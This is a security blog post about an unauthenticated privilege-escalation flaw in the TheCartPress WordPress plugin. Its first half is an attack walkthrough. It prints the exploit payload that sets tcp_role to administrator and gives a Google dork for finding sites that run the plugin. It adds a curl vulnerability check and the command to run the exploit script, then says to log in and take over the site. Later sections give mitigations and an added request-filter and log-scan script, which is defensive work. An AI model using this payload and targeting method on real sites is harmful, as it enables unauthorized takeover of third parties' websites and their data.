Security Lit Limited

Summary

The article details a security flaw in TheCartPress WordPress plugin that allows unauthenticated attackers to create administrator accounts on affected sites.

Abstract

TheCartPress, a WordPress plugin with over 10,000 active installations, contains a critical vulnerability that permits privilege escalation. This flaw, discovered by security researcher spacehen, enables attackers to craft requests that bypass WordPress's authentication system and create administrator accounts without needing to log in. The article outlines the technical aspects of the exploit, including the specific parameters that can be manipulated to achieve unauthorized access. It also provides guidance on identifying vulnerable sites using Google dorks and exploiting the vulnerability using a Python script. To mitigate the risk, the author recommends updating or uninstalling TheCartPress, using .htaccess rules to block access to the vulnerable admin-ajax.php file, or employing a web application firewall like Wordfence.

Opinions

  • The author emphasizes the importance of maintaining and updating WordPress plugins to prevent security breaches.
  • The article suggests that the removal of TheCartPress from the WordPress plugin repository is due to its security issues and lack of updates since April 2018.
  • It is implied that replacing TheCartPress with a more secure and maintained alternative is a preferable solution to mitigating the vulnerability.
  • The author indicates that while blocking access to admin-ajax.php might mitigate the specific vulnerability, it could negatively impact the functionality of other plugins.
  • The use of a web application firewall (WAF) is recommended as an effective protective measure against exploits targeting WordPress plugin vulnerabilities.

How to Exploit a WordPress Plugin Vulnerability: A Case Study of TheCartPress


WordPress plugins are essential for adding functionality and features to your website, but they can also introduce security risks if they are not updated or maintained properly. In this blog post, I will show you how to exploit a privilege escalation vulnerability in TheCartPress plugin, which allows an unauthenticated attacker to create an administrator account on any WordPress site that uses this plugin.

What is TheCartPress Plugin and What is the Vulnerability?

TheCartPress is a WordPress plugin that allows you to create an online store with various features such as product management, shopping cart, checkout, payment gateways, and more. It has over 10,000 active installations and is compatible with WordPress versions up to 5.7.

However, TheCartPress has a serious security flaw that was discovered by spacehen, a security researcher who published exploit code on October 4th, 2021 [1]. The vulnerability is an unauthenticated privilege escalation that allows an attacker to create an administrator account on the target site by sending a specially crafted request to the admin-ajax.php file with the action parameter set to tcp_register_and_login_ajax.

The exploit code works by sending the following data to the admin-ajax.php file:

data = {
	"tcp_new_user_name" : "admin_02",
	"tcp_new_user_pass" : "admin1234",
	"tcp_repeat_user_pass" : "admin1234",
	"tcp_new_user_email" : "[email protected]",
	"tcp_role" : "administrator"
}

The tcp_role parameter is the key to this vulnerability, as it allows the attacker to specify any role they want for the new user, including administrator. The plugin does not check or validate this parameter before creating the user, so it effectively bypasses the WordPress authentication system.

How to Find and Exploit Vulnerable Sites Using TheCartPress Plugin?

To find vulnerable sites that use TheCartPress plugin, you can use a Google dork such as:

inurl:/wp-content/plugins/thecartpress/

This will return a list of sites that have the plugin installed in their wp-content directory. You can then use a tool like curl or wget to check if the admin-ajax.php file exists and responds with “User name is required” when accessed without any parameters. For example:

curl https://example.com/wp-admin/admin-ajax.php

If you see “User name is required” in the response, then the site is vulnerable and you can proceed to exploit it using the exploit code provided by spacehen [1]. You can run the exploit code with python3, passing the target URL as an argument. For example:

python3 exploit.py https://example.com

The exploit code will print “Success!” if it successfully creates an administrator account with the username admin_02 and the password admin1234. You can then log in to the WordPress dashboard using these credentials and take over the site.

How to Protect Your Site from This Vulnerability?

The best way to protect your site from this vulnerability is to update or uninstall TheCartPress plugin as soon as possible. The plugin has not been updated since April 2018 and has been removed from the WordPress plugin repository due to security issues [2]. Therefore, it is highly recommended that you replace it with a more secure and maintained alternative.

If you cannot update or uninstall TheCartPress plugin for some reason, you can try to mitigate the vulnerability by blocking access to the admin-ajax.php file using .htaccess rules or firewall rules. However, this may affect the functionality of other plugins that rely on admin-ajax.php for legitimate purposes.

Another way to protect your site from this vulnerability is to use a web application firewall (WAF) such as Wordfence [3], which can detect and block malicious requests that exploit WordPress plugin vulnerabilities. Wordfence also provides alerts and updates on new WordPress vulnerabilities and how to fix them.
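A request filter and access-log triage that narrows the blanket admin-ajax.php block from the two paragraphs above to the vulnerable action and the client-supplied tcp_role parameter. This is an added example, not code from the original article, from TheCartPress or from Wordfence; it assumes an Apache/nginx combined log format and uses constructed sample lines.

```python
"""Request filter and access-log triage for the TheCartPress
tcp_register_and_login_ajax privilege-escalation request (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

VULN_ACTION = "tcp_register_and_login_ajax"
AJAX_PATH = "/wp-admin/admin-ajax.php"
# Combined log: client - - [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (not captured from a real site).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Oct/2021:10:00:00 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=tcp_register_and_login_ajax HTTP/1.1" 200 15 "-" "python-requests/2.26.0"',
    '198.51.100.7 - - [04/Oct/2021:10:00:01 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
]

def classify_request(method, url, body=""):
    """Return ("block", reason) or ("allow", None) for one request.
    Only requests carrying the vulnerable action or a client-supplied tcp_role
    are blocked, so other plugins that depend on admin-ajax.php keep working
    (a blanket .htaccess deny on admin-ajax.php would break them).
    """
    parts = urlsplit(url)
    if not parts.path.endswith(AJAX_PATH):
        return ("allow", None)
    params = parse_qs(parts.query)
    if method.upper() == "POST":
        params.update(parse_qs(body))
    if VULN_ACTION in params.get("action", []):
        return ("block", "action=" + VULN_ACTION)
    if "tcp_role" in params:
        # The role of a self-registered user must never come from the client.
        return ("block", "client-supplied tcp_role=" + params["tcp_role"][0])
    return ("allow", None)

def scan_access_log(lines):
    """Return (client_ip, status) for log hits that carry the vulnerable action.
    Caveat: an access log records only the query string, so an exploit that
    sends its parameters in the POST body is invisible here; pair this with
    the request filter above in a WAF that inspects bodies.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and classify_request(m.group(2), m.group(3))[0] == "block":
            hits.append((m.group(1), m.group(4)))
    return hits
```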

Conclusion

WordPress plugin vulnerabilities are a common and serious threat to WordPress sites, as they can allow attackers to compromise your site and access your data. In this blog post, I showed you how to exploit a privilege escalation vulnerability in TheCartPress plugin, which affects over 10,000 WordPress sites. I also gave you some tips on how to find and protect your site from this vulnerability.
